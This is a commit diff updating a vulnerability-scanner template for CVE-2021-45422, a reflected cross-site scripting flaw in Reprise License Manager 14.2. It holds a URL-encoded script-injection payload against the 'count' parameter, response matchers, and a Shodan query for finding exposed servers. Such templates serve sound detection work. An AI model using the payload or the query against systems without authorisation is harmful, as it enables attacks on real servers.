Update CVE-2021-45422.yaml

patch-1
Ritik Chaddha 2022-08-09 22:09:51 +05:30 committed by GitHub
parent 9be08c53cc
commit 898667983b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 14 additions and 10 deletions

View File

@ -4,35 +4,39 @@ info:
name: Reprise License Manager 14.2 - Reflected XSS name: Reprise License Manager 14.2 - Reflected XSS
author: edoardottt author: edoardottt
severity: medium severity: medium
description: Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability in the /goform/activate_process "count" parameter via GET. No authentication is required. description: |
Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability in the /goform/activate_process "count" parameter via GET. No authentication is required.
reference: reference:
- https://seclists.org/fulldisclosure/2022/Jan/31 - https://seclists.org/fulldisclosure/2022/Jan/31
- https://nvd.nist.gov/vuln/detail/CVE-2021-45422
- https://www.getinfosec.news/13202933/reprise-license-manager-142-reflected-cross-site-scripting#/ - https://www.getinfosec.news/13202933/reprise-license-manager-142-reflected-cross-site-scripting#/
- https://nvd.nist.gov/vuln/detail/CVE-2021-45422
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1 cvss-score: 6.1
cve-id: CVE-2021-45422 cve-id: CVE-2021-45422
cwe-id: CWE-79 cwe-id: CWE-79
metadata:
verified: true
shodan-query: http.html:"Reprise License"
tags: cve,cve2021,reprise,xss tags: cve,cve2021,reprise,xss
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/goform/activate_process?isv=&akey=&hostid=&count=%3Cscript%3Ealert(%221%22)%3C/script%3E" - "{{BaseURL}}/goform/activate_process?isv=&akey=&hostid=&count=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status - type: word
status: part: body
- 200 words:
- 'value=""><script>alert(document.domain)</script>"><input type='
- type: word - type: word
part: header part: header
words: words:
- "text/html" - "text/html"
- type: word - type: status
part: body status:
words: - 200
- "<script>alert(\"1\")</script>"